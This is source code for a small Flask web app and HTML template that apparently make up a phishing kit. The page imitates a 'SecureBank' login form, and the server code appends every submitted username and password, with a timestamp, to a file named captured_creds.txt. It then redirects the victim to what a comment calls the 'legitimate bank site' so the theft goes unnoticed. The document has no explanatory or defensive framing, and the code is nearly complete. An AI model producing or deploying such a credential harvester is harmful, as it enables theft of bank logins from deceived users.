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flask import Flask, render_template, request, redirect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app = Flask(__name__)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@app.route('/')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 index():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return render_template('login.html')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@app.route('/login', methods=['POST'])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def login():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username = request.form['username']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password = request.form['password']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# Log captured credentials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with open('captured_creds.txt', 'a') as f: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timestamp = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')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f.write(f'{timestamp} - Username: {username}, Password: {password}\n')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# Redirect to legitimate bank site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return redirect('http://192.168.x.x:8000')  # Replace with actual IP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app.run(host='0.0.0.0', port=80)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&lt;!-- templates/login.html --&gt;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&lt;title&gt;SecureBank - Login&lt;/title&gt;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&lt;style&gt;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body { font-family: Arial; margin: 40px;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.login-form { max-width: 300px; margin: auto;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input { width: 100%; padding: 8px; margin: 10px 0;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button { width: 100%; padding: 10px; background: #007bff; color: white; border: none;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&lt;/style&gt;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&lt;div class="login-form"&gt;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&lt;h2&gt;SecureBank Login&lt;/h2&gt;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&lt;form method="POST" action="/login"&gt;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&lt;input type="text" name="username" placeholder="Username" required&gt;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&lt;input type="password" name="password" placeholder="Password" required&gt;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&lt;button type="submit"&gt;Login&lt;/button&gt;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&lt;/form&gt;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&lt;/div&gt;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